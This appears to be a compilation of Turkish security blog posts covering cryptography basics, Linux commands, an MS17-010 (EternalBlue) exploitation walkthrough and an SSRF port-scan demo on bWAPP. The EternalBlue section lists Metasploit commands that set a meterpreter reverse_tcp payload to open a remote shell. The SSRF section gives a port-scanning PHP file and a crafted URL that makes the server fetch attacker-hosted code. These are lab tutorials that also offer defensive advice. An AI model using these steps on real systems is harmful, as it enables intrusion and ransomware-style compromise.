Merhaba,
Uzun bir aradan sonra Kriptografiye Giriş yazısının ikinci kısmıyla karşınızdayım. Bir önceki yazıyı okumak için buraya tıklayabilirsiniz.
Bu yazıda Kriptografi biliminin temel konseptlerinden olan şifreleme(encryption) ve doğrulama(authentication) süreçlerinden bahsedeceğim.

1. Şifreleme (Encryption)

Şifreleme, Kriptografi bilimiyle ulaşılmak istenen önemli hedeflerden biridir. Şimdi ilk ve en temel senaryomuzu modelleyelim.

Senaryolarımızın olmazsa olmaz üçlüsü: Alice, Bob ve Eve. Bu modelde birbirleriyle iletişim kurmak isteyen Alice ve Bob’un yanı sıra bu iletişimin gerçekleştiği güvenli olmadığı varsayılan iletişim kanalını dinleyebilen Eve karşımızda. Alice ve Bob’un amacı ise Eve’e karşın birbirleriyle iletişim kurmak. Yazı boyunca bu süreçte Eve’in olası saldırılarına karşın Alice ve Bob’un amaçlarına ulaşmak için kullanacağı çözümleri görmüş olacaksınız.Bu amaca ulaşmak adına ilk olarak, Alice ve Bob daha önceden anlaştıkları şifreleme anahtarını (Ke) kullanıyorlar. Bu anahtar üzerinde nasıl anlaşıkları yani anahtar değişimi aslında ayrı bir yazı konusu olacak kadar önemli; fakat bu senaryoda anahtarı birbirlerine mail attıklarını varsayalım. Alice göndermek istediği mesajları(m) önce bu bu anahtar(Ke) ve bir şifreleme fonksiyonu (E) kullanarak şifreledikten sonra gönderiyor. Bob başka bir fonksiyona(D) anahtar(Ke) ve kendisine ulaşan şifreli mesajı(c) vererek orjinal mesajı(m) elde ediyor. İletişim kanalını her zaman dinleyen Eve, anahtara sahip olmadığından elde ettiği şifreli mesajı çözemiyor. Burada basit bir şekilde modellediğimiz senaryoyu mail alıp gönderirken kullandığımız gibi bilginin depolanması aşamasında da kullanıyoruz. Burda söz konusu, bilginin fiziksel ortamının değişmesi değil de bilginin zamanın farklı anlarını arasında taşınmasıdır. Bu durumda Alice ve Bob zamanın farklı dilimlerini temsil ediyor.

Kerckhoffs İlkesi

Yukarıda bahsettiğimiz Alice ve Bob’un güvenli iletişim kurmasını sağlayan şifreleme düzeni, kullandıkları şifreleme fonksiyonun gizliliğine değil de kullandıkları şifreleme anahtarının gizliliğine dayanmalıdır. Kerckhoffs İlkesi şifreleme sisteminin ya da düzeninin güvenliği, kullanılan anahtarının gizliliğine dayanması ilkesidir.
Bu ilkenin arkasında mantıklı sebepleri maddeleyecek olursak,

• Algoritmalar yazılım ya da donanımlar üzerine konuşlandırıldığından değiştirilmeleri zordur.
• Aynı algorimanın uzun süre kullanılması daha kullanışlı ve pratiktir. Günümüzde karşımıza çıkan çoğu protokolun bu şekilde kullanılması gibi.
• Bir anahtarın gizli tutulması, bir algoritmanın gizli tutulmasından çok daha kolay ve ucuzdur.

Algoritmaların herkese açık hale getirilmesinin avantajları ise,

• Saldırganların olası ataklarının diğer insanlar tarafından önceden fark edilebilmesi ve hatanın giderilebilmesi
• Potansiyel güvenlik açığının vereceği zarar, algoritma gizliliğinin katacağı ekstra güvenlikten çok daha fazla olacağından gizli protokellere güvenmemeliyiz.

2. Doğrulama (Authentication)

Alice ve Bob, modellediğimiz ilk senaryoda birbirlerine gönderdikleri mesajları şifreleyerek Eve için okunamaz, anlaşılamaz hale getirmişlerdi. Bu işlem ikili arasındaki iletişimin gerçekleşmesindeki bir problemi çözmüş oldu fakat hala problemlerimiz var. Eve’in hala bu iletişimi sekteye uğratacak sinsi planları mevcut. İletişim kanalını üzerindeki hakimiyetini bildiğimiz Eve, mesajı değiştirmeye ya da yok etmeye kalkışabilir. Eve’in bu denemeleri yapabilmesi için iletişimin gerçekleştiği kanal üzerinde daha fazla yetki ve kontrole sahip olması gerekiyor fakat bu imkansız bir durum olmadığından göz önünde bulundurulması gereken bir mesele olarak karşımızı çıkıyor. Bob’a ulaşan bir mesajın, sadece ve sadece Alice tarafından oluşturulduğuna Bob nasıl ikna olacak? Eğer bu doğrulanma sağlanamaz ise, Bob’a gelen mesajın hiç bir önemi kalmayacaktır. Bu problemi çözmek için doğrulama (authentication) sürecini tanımak ve uygulamak durumundayız. Şifreleme (encryption) kısmında da bahsettiğimiz gibi bu kez Alice ve Bob’un bildiği bir doğrulama anahtarı(Ka) kullanacağız. Bir mesajın nasıl doğrulanacağını basit bir şekilde modelleyelim.

Alice göndermek istediği bir mesaji öncelikle doğrulama anahtarıyla(Ka) birlikle bir fonksiyona(H) sokarak mesaj doğrulama kodunu(message authentication code – MAC) elde ediyor(a). Mesajını ve elde ettiği MAC’i Bob’a gönderiyor. Bob kendisine gelen mesajı tıpkı Alice’in yaptığı gibi önce doğrulama anahtarıyla MAC fonksiyonuna(H) veriyor. Oluşan kodu kendisine gelen MAC ile karşılaştırıp doğrulamayı sağlayabiliyor. Eve’in muhtemel bir mesajı değiştirme çabası(m’), eşleşmeyen MACler sayesinde ortaya çıkmış olacaktır. Burda MAC fonksiyonun farklı girdiler için aynı kodlar oluşturmamasına dikkat edilmelidir. Eve’in doğrulama anahtarını bilmediğini varsayalım. İletişim kanalını dinleyebilen Eve, mesaj ve ona karşılık gelen geçerli MAC ikilisine sahip olabilir. Bu durumda Eve’in yapabileceği bir şey daha var. Eve mesajları biriktirip Bob’a daha sonra gönderebilir ya da mesajların geliş sırasını bozabilir. Bu ihtimaller hala Alice ve Bob’un yazının başında ifade ettiğim iletişim amacının önüne geçebilir. Şimdiki problemimizi sadece doğrulama (authentication) süreciyle çözemeyiz. Mesajın silinmesi ya da ardışık mesaj sırasının bozulması hala problem teşkil ediyor. Bu yüzden doğrulama işleminin yanı sıra mesaj numaralandırma işlemi de yapmamız gerekiyor. Bu işlemi her bir mesajın ardışık olarak numaralandığı bir işlem olarak tanımlayabiliriz. Alice’in gönderdiği mesaj bir mesaj numarası içerirse, Bob’un Eve tarafından kandırılması daha da zorlaşacaktır. Eve’in eski mesajları göndermesi ya da mesaj sırasını bozma girişimi Bob’un mesaj numaralarını takibiyle etkisiz kalacaktır. Bir sonraki yazıda Açık Anahtar Şifrelemesi, Dijital İmza, şifrelemeye karşın yapılan saldırılardan bahsedeceğim.

İyi Günler.

TR | Kriptografiye Giriş – 2 Furkan BUYRUKOĞLU

İlk yazıyı okumadıysanız ilk yazıya gitmek için:  Temel Linux Komutları – 1

Dosya ve Dizinlerde Yekiler

• -rwxrwxrwx –  dosya oldugunu göstermektedir.
• drwxrwxrwx d  dizin oldugunu göstermektedir.
  • r okuma yetkisi
  • w  yazma yetkisi
  • x  çalıştırma yetkisi

• Dosya/Dizin değişkeninden sonraki ilk 3 lü blok Kullanıcı yetkileri, sonraki 3 lü blok Grup yetkileri ve son 3 lü blok diğer kullanıcı yetkilerini göstermektedir.

Yetki Değiştirme

chmod [ugoa] [+-=] [rwxst] [dosya/dizin_adı]

• u  dosya/dizin sahibi
• g  dosya/dizin sahibiyle aynı gruptaki kullanıcılar
• o  diğer kullanıcılar
• a  herkes
• +  yetki ekleme
• –  yetki çıkarma
• r  okuma yetkisi
• w  yazma yetkisi
• x  çalıştırma yetkisi
• s  suid biti
• t  sticky biti

r = 4

w = 2

x = 1

rwx = 7

chmod 777  =  chmod rwxrwxrwx

• Alt dizinler/dosyalarında yetkilerini değiştirebiliriz.

chmod -R [yetki] [dosya/dizin adı]

Bazen Sistemde Yapılan Değişikliklerde sistemde yaptığımız düzenlemelerde değişiklik olduğunu görebilirsiniz. Bunların önüne geçmek için chattr komutundan faydalanabiliriz.

Dosyayı Değiştirilemez Yapmak

chattr +i [dosya/dizin adı]

Dosyaları Kontrol Etmek

lsattr

Dizin Altındaki Tüm Dosyaları Kontrol Etmek

chattr -R [dizin adı]

Suid Biti

Suid biti sistemdeki normal kullanıcının root yetkisiyle erişilen dosyalara erişebilmesi için dosyalara verilen yetkiye verilen addır.

• Suid Bitine Sahip Dosyaları Arama

find /[hedef dizin] -perm -4000

Program Kurma/Kaldırma – Sistem Güncelleme

Linux ta farklı dosya kurulum şekilleri vardır bunlardan bazıları kaynak koddan derleyip kurma, paket yönetim sistemi yardımıyla kurma yada repositorylerden çekerek kurabiliriz.

Günümüzde linux dağıtımlar genelde iki türlü paket türü kullanmaktadırlar.

• RedHat/Fedora/CentOS rpm
• Debian/Ubuntu dpkg

bunlar manuel kurulum için kullanılan paket türleridir. Repositorylerden kurulum yapmak için rpm  kullanan sistemler için yum , deb  kullanan paket yöneticileri apt  kullanır.

• Debian Tabanlı Dağıtımlarda Manuel Paket Kurmak

dpkg -i [paket_adı.deb]

• Çoklu paket içeren programları kurmak için;

dpkg - i *.deb

• Kurulu paketle ilgili bilgi almak için;

dpkg --status [paket_Adı]

dpkg -s [paket_ Adı]

• Paket Kaldırma

dpkg --purge remove [paket_Adı]

• Paketi Tamamen Silmek İçin

dpkg remove [paket_adı]

• rpm kullanan sistemlerde paket kurmak için;

rpm -ivh [paket_Adı.rpm]

i  Paketi kur

v  İşlemleri göster

h  kurulum düzeyini göster

• rpm kullanan sistemler paket kaldırmak için

rpm -ev [paket_Adı]

Repolardan Program Kurulumu

• Sistemimizde hangi repolardan program çekildiğini listelemek için alttaki dosyalara bakabilirsiniz(dağıtımınıza göre) ;

etc/apt/sourcest.list

etc/yum.repos.d

• Repodan program kurulumu için;

apt-get install  [program_Adı]

yum install [program_Adı]

• Repolarda program olup olmadığını sorugulamak için;

apt-cache search [program_Adı]

• Kuracağımız program ve paket hakkında bilgi almak için;

apt-cache show [program_Adı]

• Paket kaldırmak için;

apt-get remove [program_Adı]

• Programı konfigğrasyonları ile birlikte kaldırmak için;

apt-get purge remove [program_Adı]

• Sitemde eski kurulumdan kalan paketleri temizlemek için;

apt-get autoremove

apt-get autoclean

Sistem Güncelleme

apt-get update

apt-get upgrade

• Sistem sürümü yükseltmek için;

apt-get dist-upgrade

Dizin Oluşturma Silme

mkdir [dizin_Adı]

• Birden fazla dizin için;

mkdir [dizin_Adı1] [dizi_Adı2]

• Alt alta dizin oluşturmak için;

mkdir -p [dizin_Adı1]/[dizin_Adı2]/[dizin_Adı3]

• Dizini içindeki dosyalarla beraber silmek için;

rm -r [dizin_Adı]

• Silerken sorgu almak için;

rm -ir [dizin_Adı]

• Direk silmek için;

rm rf [dizin_Adı]

• Birden fazla dizin silmek için;

rm -ir [dizin_Adı1] [dizin_Adı2]

Dosya İşlemleri

cat

• Text okuma;

cat /etc/passwd

• Text dosyası oluşturalım ve içine birşeyler yazalım(ctrl+d) dosyayı kapatalım;

cat > [dosya_Adı] [metin]

toch

• Text dosyası oluşturmak için;

touch [dosya_Adı]

more

• Dosya içeriğini daha düzgün şekilde okumak için;

more [dosya adı]

echo

• Dosya oluşturup içine birşeyler not almak için;

echo "deneme" > [dosya_Adı]

• Dosya mevcut ve içi dolu ise var olan metnin altına bişeyler eklemek için;

echo "deneme" >> [dosya_Adı]

tail

• Dosyanın son 10 satırını okumak için;

tail [dosya_Adı]

• Son n satırı görüntülemek için;

tail -n [dosya_Adı]

less

• Dosya okumak için;

less [dosya_Adı]

sort

• Dosya çıktısını alfabetik olarak sıralatmak için;

sort [dosya_Adı]

• Komut çıktılarını daha düzgün şekilde almak;

[komut] | sort

wc

• Dosyadaki satır satısı için;

wc -l [dosya_Adı]

• Dosyadaki karakter satısı için;

wc -c [dosya_Adı]

• Dosyadaki kelime sayısı için;

wc -w [dosya_Adı]

head

• Dosyanın ilk 10 satırını görüntülemek için;

head [dosya_Adı]

• Dosyanın ilk n satırını görüntülemek için;

head -n [dosya_Adı]

nl

• Satır başlarına numara eklemek için;

nl [dosya_Adı]

pr

• Dosya içeriğini sayfalara bölmek için;

pr [dosya_Adı]

od

• Dosya içeriğini 16 lık sistemde görüntülemek içinİ

od  -x [dosya_Adı]

• Dosya içeriğini 8 lik sitstemde görüntülemek içinİ

od [dosya_Adı]

tee

• Dosya oluşturup içine yazmak için;

tee [dosya_Adı]

paste

• İki yada daha fazla dosyayı okuyup satırları yan yana görüntülemek için;

paste [dosya_Adı1] [dosya_Adı2]

| operatörü

• Pipe işlemlerinde kullanılır. Örneğin bir komutun çıktısını diğer komutla birleştirmek için;

[komut1] | [komut2]

** echo komutunda ‘ (ters tırnak) arasındaki girdi string değilde komut olarak algılanır.

grep

• Dosya da belli bir kelime aratcağımız zaman;

grep [kelime]

• Büyük/Küçük harf ayrımı yapmaması için;

grep -i [kelime]

• Aranan kelimenin bulunduğu satır numaralarını görüntülemek için;

grep -ni [kelime]

• Bulunduğumuz dizinde tüm dosyalarda belli bir stringi aratmak için;

grep [kelime] * | more

cut

• -d  ayrılacak alanları
• -f  hangi alanları görüntülemek istiyorsak
• -c  gösterilecek karakter sayısı

tr

• İçerikteki harfleri değiştirmek için kullanılır, örneğin harfleri büyütmek için;

cat [dosya] | tr a-z A-Z

• <  operatörü önceki dosyayı girdi olarak almasını sağlamak için kullanılır. Örneğin dosya içindeki karakterleri büyütüp yeni bir dosyaya kaydetmek için;

tr a-z A-Z <[dosya]> [yeni_dosya]

• -d  karakteri yok saymak için;

cat [dosya] | tr -d [karakter]

file

• Dosyanın ne tür dosya olduğunu sorgulamak için kullanılır.

file [dosya]

• Bir dizin altındaki dosyaların hangi türlerinde olduğunu görüntülemek için;

ls -F

• *  işareti olanlar çalıştırılabilir dosyalar.
• @  olan dosyalar linkli dosyalar.

find

• Arama yapmak için kullanılır;

find [dizin] [parametre] [aranılan dosya/dizin]

• Home diznindeki yetkisi 644 olan dosyaları bulmak için;

find /home -perm 644 | more

locate

• Tüm dosya ve dizinlerde arama yapmak için;

locate [dosya_Adı]

whereis

• Programın çalıştırılabilir dosyasını arama için;

whereis [dosya_Adı]

which

• Programın çalıştırılabilir dosyasının hangi dizinde olduğunu bulmak için;

which [dosya_Adı]

Regex

• []  içerisindeki karakterlerin istenilen şablonda kullanılabilceğini gösterir.
• .  ile gösterilen yere istenilen karakterin gelebileceğini gösterir.
• *  her hangi bir karaktere denk gelir.
• ^  satır başına denk gelir.
• $  satır sonuna denk gelir.
• [^..]  küme içindeki karakterler harici değerleri işaret eder.
• \{n\}  kendisinden önceki karakterin n kez tekrar edildiğini gösterir.
• \{n,m\}  kendisinden önceki karakterin en az n kez en fazla m kez tekrar edildiğini gösterir.
• \{n,\}  kendisinden önceki karakterin en az n kez olduğunu gösterir.
• \+  kendisinden önceki karakterin bir fazla yada bir az olduğunu gösterir.
• \?  kendisinden önceki karakterin sıfır yada bir kez bulunduğunu gösterir.
• \|  kendisinden bir önceki veya bir sonraki karaktere karşılık gelir.
• \(..\)  grup olarak düzenli deyimleri atar.
• \  özel karakterlerin normal karakter olarak algılar.

SED

Text dosyaları üzerinde  değişiklik yapmamıza yardımcı olur.

• -n  Belirtilen satırlara işlem yap.
• -e  Bir sonraki komutu düzenleme komutu.
• -f  Bir sonraki dosya adı.
• p  Yazdır.
• d  Silme.
• s/değişecek ifade/yerine gelecek ifade/g Text içinde kelime değiştirme.
  • nd  n. satırı sil.
  • /^$/d  tüm boş satırları sil.
  • s/*$//  her satır sonundaki boşlukları sil.
  • /xam/d  “xam” olan tüm satırları siler.
  • s/00*/0/g  ardışık 0 ların yerine 0 yaz.
  • sed -e “s/apple/elma/g” -e “s/prg/program/g”  aynı anda birçok değişiklik yapmak için.
  • s/\./&\/g  noktadan sonra gelen karakterleri yeni satıra kaydır.
  • 10,20d 10. satırla 20. satır arasını sil. (10. ve 20. satır dahil)
  • /\*\**\*$/d  satırın tamamı ***** olan satırları sil.
  • sed -e “s/[^|]*$//” <dosya>  belirtilen dosyadaki tab ve boşluk karakterlerini kaldır.

Dosya Kopyalama, Taşıma ve Silme İşlemleri

Dosya kopyalamak için cp  komutu kulanılır.

• cp kopyalanacak_dosya kopya_adı

Dosya taşımak için mv  komutu kullanılır.

• mv dosya /hedef_dizin

Dosya silme işlemi için rm komutu kullanılır.

• rm dosya_adı

Dizin silmek için rm -r  komutu kullanılır.

• rm -r /silinecek_dizin

TR | Temel Linux Komutları – 2 Mustafa Kaan Demirhan

Shadow Brokers ekibi tarafından NSA’ye ait Windows Hacking araçları bir kaç ay önce sızdırıldı. Windows bilgisayarları kolayca istismar etmek için NSA tarafından yazılan/kullanılan araçlar adete bir cephanelik gibi içerisinde çok önemli araçlar bulunmaktadır.Eternalblue & Doublepulsar olarak adlandırılan kısaca smb üzerinden dll injection yaparak hedefe sızmayı sağlıyor.Hatta EternalBlue zafiyetinden yararlanarak WannaCry ve Petya zararlı yazılımları dünyada birçok sistemi olumsuz etkilemiştir.

Araçlara aşağıdaki linkten ulaşabilirsiniz

https://github.com/misterch0c/shadowbroker

Tenable Network Security ekibi yaptığı açılamada.
Sızdırılan veriler arasında birçok exploit ve zero-day açıkları bulunuyor. Hatta bazı exploitler seçili Windows sistemleri üzerinde ‘God Mode’ özelliği bile sunuyor. Hedeflenen ürünler arasında Lotus Notes, Lotus Domino, IIS, SMB, Windows XP, Windows 8, Windows Server 2003 ve Windows Server 2012 bulunuyor.

Yayınlanan araçlardan en çok dikkat çekeni Windows’taki CVE-2017-010 SMB güvenlik açığını inceleyeceğiz.Shodow Brokers bu belgeleri 14 Nisanda açıklamıştı.Windows Mart ayında bu zafiyetin yamasını daha önceden yayınlamıştı.Yamanın yayınlanmasına rağmen güncelleme yapmayan bilgisayarlar için potansiyel olarak hala tehlike halindedir.Bu zafiyetin kullanılabilmesi için 445 smb portunun açık olması gerekmektedir.

CVE-2017-010 SMB zafiyeti Windows XP işletim sistemlerde görülen MS08-067(exploits/windows/smb/ms08_067_netapi) zafiyetini de akıllara getirdi ve daha fazla sistem etkilenmiş durumdadır.Aşağıda etkilenen sistemler listesi gözükmektedir.

Windows Server 2003 SP0 (x86)
Windows XP (all services pack) (x86) (x64)
Windows Server 2003 SP1/SP2 (x86)
Windows Server 2003 (x64)
Windows Vista (x86)
Windows Vista (x64)
Windows Server 2008 (x86)
Windows 7 (all services pack) (x86) (x64)
Windows Server 2008 R2 (x86) (x64)

Kontrol Yöntemleri

1)Python Script

Hedef makinada bu açıklığın olup olmadığını anlamak için aşağıdaki python scripti bu kontolü yapılabilmektedir. Kullanımı çok basitir.

Betiği indirelim.

wget https://raw.githubusercontent.com/nixawk/labs/master/MS17_010/smb_exploit.py

Python scripti çalıştırmak için argüman olarak taranmak istenen ip adresi yazılmalıdır.Tarama sonucunda hedef sistemde bu zafiyet varsa “is likely VULNERABLE to MS17-010!” yazısı çıkmaktadır eğer zafiyet bulunmuyorsa does “NOT appear vulnerable” yazısı çıkacaktır.

python smb_exploit.py 192.168.2.146

Taranan ip’de zafiyet olduğu gözükmektedir.

2)Metasploit Auxiliary

Metasploit ile yapacağımız taramalarda daha önce tespit ettiğimiz hedef IP adreslerini kullanacağız
CVE-2017-010 zafiyetinin bir makinada olup olmadığını anlamak için metasploit’te hazır bulunan smb_ms17_010 auxiliary’ini kullanırız.

msfconsole
msf> use auxiliary/scanner/smb/smb_ms17_010

Metasploit’te smb_ms17_010 auxiliary’e hedef ip’yi verdikten sonra bize CVE-2017-010 zafiyeti bulunup bulunmadığını söyleyecek.

msf>set rhosts 192.168.2.144

set rhosts komutundan sonra istenirse ip’lerin arasına boşluk konularak daha fazla ip taraması yapılabilmektedir.

msf>set rhosts 192.168.2.144 192.168.2.146 10.15.124

[!] 192.168.2.144:445 – Host is likely VULNERABLE to MS17-010! —>Makinada zafiyet MS17-010 zafiyeti var.

3)Nmap Scripts

Hedef sistemde bu açıklığın olup olmadığını anlamanın diğer bir yöntemi ise nmap aracıdır.MS017-01 exploitnin kontrolü için yazılan betik nmap scrips klasörü altına atıldıktan sonra kullanıma hazır olacaktır.Script’,in nmap script klasörü içerisine eklenmesi gerekmektedir.

cd /usr/share/nmap/scripts

wget https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse

Bu açıkık smb 445 portundan kaynaklandığı için aşağıdaki nmap komutu ile kontol sağlanmış olur.

nmap -p445 --script smb-vuln-ms17-010 192.168.1.42

Tarama sonucunda ms17-010 açıklığının olduğu anlaşılmış oldu.

4)Online Tarama

Eğer internete açık Windows sunucularınızda MS17-010 zafiyetinin olup olmadığını http://ms17-10.com üzerinden de online olarak ücretsiz bir şekilde test edebilirsiniz.

Exploit Etme İşlemleri

1)Metasploite Exploit Ekleme

Metasploit kullanarak meterpreter için aşağıdaki linkeki dosyaları eklemeliyiz.

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Exploit windows’a ait dll dosyaları içierdiği için wine32’nin kurulu olması gerekmektedir.

Kullandığınız işletim sisteminiz 64 bit ise aşağıdaki komut ile wine32 kurulmalıdır.

dpkg --add-architecture i386 && apt-get update && apt upgrade -y && apt autoremove

apt-get install wine32

Kurulum bittikten sonra wine programının tam olarak çalıştığından emin olmak için küçük herhangi bir exe dosyası çalıştırmayı deneyiniz.

Örnek olarak cmd.exe yi çalıştırabilirsiniz

wine cmd.exe
exit

Exploit için ilk önce metasploit’in veritabanı olarak kullandığı postgresql servisi başlatılmalıdır.

service postgresql start

Metasploit dizindeki Windows smb exploitlerinin bulunduğu dizine terminalden gelinir.

cd /usr/share/metasploit-framework/modules/exploits/windows/smb/

Exploit belirtilen dosya içine indirilir.

wget https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/blob/master/eternalblue_doublepulsar.rb

İndirilen exploit’in metasploit tarafından algılayabilmesi için postgresql servisi yeniden başlatılır.

service postgresql restart

Terminalden yeni bir sekme açalım ve ana dizine gidelim ve exploitimizin çalışması için gerekli olan dosyaları indirelim.Gerekli dosyaların bulunduğu dizinen gidelim ve dosya yolunu kaydedelim.

cd ~
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd Eternalblue-Doublepulsar-Metasploit/
cd deps/
pwd

Dosya yolunu indirdiğimiz exploitin içine eklemeliyiz.Exploit’i açalım.

nano /usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb

TARGETARCHITECTURE ve ETERNALBLUEPATH’a /root/Eternalblue-Doublepulsar-Metasploit/deps dizinini ekleyelim.

Böylece her exploiti kullanmak istediğimizde kütüphanelerin bulunduğu dizini her seferinde yazmak zorunda kalmayız.
ssss

Metasploit açtıktan sonra “eternalblue_doublepulsar” exploitimizi açalım.Exploit edilecek hedef ip yazılır(rhost) daha sonra hedef işletim sistemine göre target(set target 8) belirlenir.info komutu ile exploitin desteklediği işletim sistemleri belirlenebilir.Hedef işletim sisteminin mimarisi belirlenir(32 mi 64 bit mi).Exploit edilme işlemi sonrasında hedef sisteme sızmak ve istenilen işlemleri gerçekleştirmek için payload belirlenmelidir(set payload).Sardırgan ip adresi(lhost) sisteme girilir ve exploit işlemi başlatıtır(run ya da exploit).

msfconsole
msf>use exploit/windows/smb/eternalblue_doublepulsar
msf>show options
msf>set rhost 192.168.2.144
msf>set target 8
msf>set targetarchitecture x64
msf>set payload windows/x64/meterpreter/reverse_tcp
msf>set lhost 192.168.2.128
msf>run

2)Hazır Metasploit Exploiti

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.69.146
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.69.138
run

 

 

Wannacry Virüsü

Wannacry virüsü Mayıs ayında dünya çapında birçok ülkeyi etkileyen büyük çapta bir fidye yazılım saldırısı gerçekleştirilmiştir. Wannacry fidye virüsü hedeflerini mail atma phishing gibi sosyal mühendislik yöntemleri yerine hiçbir kullanıcı etkileşimine gerek kalmadan Microsoft Windows’un SMBv1 sisteminde bulunan MS17-010 kapsamında tanımlanıp güncelleme yapılmamış bilgisayarlardaki güvenlik açığından faydalanarak bulaşmaktadır.Türkiye wannacry virüsünden pek etkilenmese de Rusya ve İngiltere’ninde içinde bulunduğu 74 ülke etkilenmiştir.

Petya Fidye Yazılımı

Petra  sırasıyla Ukrayna, Danimarka, İspanya ve Fransa’da görülmeye başlandı.Bulaştığı yerlerden şirketleri etkileyerek 300 dolarlık fidye talep etmektedir.Petya yazılımı ransomware’in bu yeni gelişmiş bir versiyonu olacak düşünülebilir.Geçen aylarda sadece 72 saatte 300.000 sistem ve sunucuya bulaştığı gözlemlenmiş ve tıpkı WannaCry gibi Windows SMBv1 güvenlik açığı (MS17-010) sayesinde hızla yaygınlık göstermiş ve bulaşmasıda kolay olmuştur.

Petra SMBv1 güvenlik açığının dışında spam e-postalar ile sisteme enfekte olmaktadır. Bilgisayar kullanıcılarına CVE-2017-0199 zafiyeti üzerinden sosyal mühendislik yömtemleriyle e-postalar yoluyla bulaştırılmaktadır.

Wannacry ve Petya’dan Korunma Yöntemi

Kullanılmakta olan Windows işletim sisteminin güncelleştirmeleri  düzenli olarak yapılmalıdır.Lisanslı, güncel antivirüs ve bilenen antivirüs yazılımı kullanılmalıdır.Antivirüsler kendi otomatik güncellemeleri dışında elle güncelleme yapılarak ,virüs imzaları sürekli güncel olmalıdır.445 portunu kullananSMBv1 protokolü kullanılmıyorsa kapatılmalıdır.Önemli verilerinizin tutulduğu sistemlerin düzenli olarak son  yedeklerini kontrol edilerek yedeklemeler otomatize bir şekilde yapılmalı.Alınan yedekler farklı bir sunucuda tutulmalıdır.Özellikle dışarıya açık UDP port 137 ve 138, TCP port 139 ve 445’i kapatılması gerekmektedir.Petrada görülen perfc.dat dosyası diğer sistemlere mail yoluyla gönderiliyor ve kuruluyor bunu önlemek için  PSexec’in çalıştırılmasını antivirüsler yoluyla engelleyin.Şirket çalışanları tarafından virüsün tüm sisteme yayılmasını önlemek için gerekiyorsa kullanıcılara dosyalara okuma izni verilmelidir.

TR | MS17-010 Zafiyeti ve Korunma Yöntemleri Cihan Mehmet Doğan

Server Site Request Forgery, Sunucu Taraflı İstek Sahteciliği olarak türkçeye çevrilebilenceğimiz bir açıklıktır.
Sunucu Taraflı İstek Sahteciliği veya SSRF, bir saldırganın bir sunucuyu kendisi adına istekte bulunmaya zorlayan bir güvenlik açığıdır.
Biraz daha açacak olursak bir saldırganın güvenlik açığından etkilenen sunucuya gelen istekleri oluşturmak veya denetlemek için web uygulamasında kullanılan bir parametreyi değiştirmesine olanak verir.
Bir web uygulamasındaki bilgiler, başka bir web sitesinden gelen harici bir kaynaktan alınmak zorundaysa, sunucu tarafı istekleri kaynağı alıp web uygulamasına dahil etmek için kullanılır. Bu şekilde sunucuda kendi isteklerimizi çalıştırabildiğimizde açıklıktan etkinlenen sunucu ve sunucunun bulunduğu networkde büyük risk oluşturabilmektedir. Zafiyetten eetkilenen sunucuyu proxy olarak kullanarak internal network e erişim sağlayabilriz. SSRF kullanarak Cross Site Port Attack (XSPA) saldırısı yapmamıza olanarak sağlamaktadır.
Cross Site Port Attack (XSPA) ile etkilenen sunucu bulunduğu internal networkdeki sunuculara port taraması yapabiliriz.

SSRF saldırıları kullanarak şunları yapmak mümkündür:

• Sunucu(lar)daki dosyaları okuma
• Normal olarak erişilemeyen iç ağdaki tarama ve saldırı sistemleri
• Bu ana makinelerde çalışan hizmetleri numaralandırmak ve saldırmak
• Host-Based tabanlı kimlik doğrulama hizmetlerinden faydalanarak authentication bypass

Bunlardan bir kaçıdır.

Zafiyeti kısaca değindik neden kaynaklandığını, neler yapabileceğinizi artık biliyorsunuz. Gelelim şimdi bWAPP (buggy web application)  üzerinden küçük bir SSRF demosuna.

bWAPP üzerinde SSRF Sekmesinde bu zafiyeti RFI sekmesi üzerinden SSRF kullanarak Port taraması yapmamızı istemekte. Port scan kısmına tıklarsanız size bu işlemi yapabilecek php kodlarını vermektedir. İsterseniz o url üzerindende tetikleyebilirsiniz. Fakat kendiniz o dosyayı indirip kendi atacker ipnizden ya da bir site üzerine yükleyerek tetikleyebilirsiniz.

Port scan sözcüğünün üzerine tıkladığınız açılan sayfa bu şekildedir. Şimdi bu kodu kopyalayarak atak yaparken kullanacağınız pc nin Desktop ına dosya oluşturarak yapıştırınız.

<?php


if(isset($_REQUEST["ip"]))
{
    
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    
    $results = array();
    
    foreach($ports as $port)
    {

        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {

            $results[$port] = true;
            fclose($pf);
            
        }
        
        else
        {

            $results[$port] = false;        

        }

    }
 
    foreach($results as $port=>$val)
    {

        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {

            echo "<span style=\"color:green\">OK</span><br/>";

        }

        else
        {

            echo "<span style=\"color:red\">Inaccessible</span><br/>";

        }

    }

}
?>

Benim düzenlediğim dosya burada bWAPP üzerindeki dosyada XSS payloadıda bulunmaktaydı fakat onu çıkarttım denemek isteyenler o satırı ekleyebilirler. Şimdi bu kodu masaüstümüzde ssrf.txt adında bir dosya açıp içine yapıştırıyoruz.

Burda gördüğünüz işlem kendi makinamın Desktop dizinini kendi ip adresim üzerinden 8000 portu ile dışarıya açmama yarayan komuttur.

 python -m SimpleHTTPServer PortNo

şeklindedir.

Artık gelelim SSRF açığını kullanarak port tarama saldırımıza.

http://192.168.2.35/bWAPP/rlfi.php?language=lang_en.php&action=go  normal  urlimizi bu fakat biz bu urlde language parametresinde biraz önce düzeltiğimiz ve yayına açtığımız ssrf.txt dosyasının urlini giriyoruz. Ve bunun önüne kendimiz bir ip parametresi tanımlıyoruz ve portlarını taranacak ip adresini giriyoruz.Bu ip adresi bWAPP ın kurulu olduğu sunucunun ipsi bu örneğimizde. Gördüğünüz gibi atak başarılı bir şekilde gerçekleşti ve port tarama sonuçları önümüze geldi. http://192.168.2.35/bWAPP/rlfi.php?ip=192.168.2.35&language=http://192.168.2.228:8000/ssrf.txt&action=go

Bu şekilde SSRF açıklığı bulunan bir sistemte proxy olarak kullanarak internal networke ulaşıp oradada keşif ve port taraması yapabilmek mümkündür. Başka bir yazıda görüşmek üzere.

Referanslar:

http://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
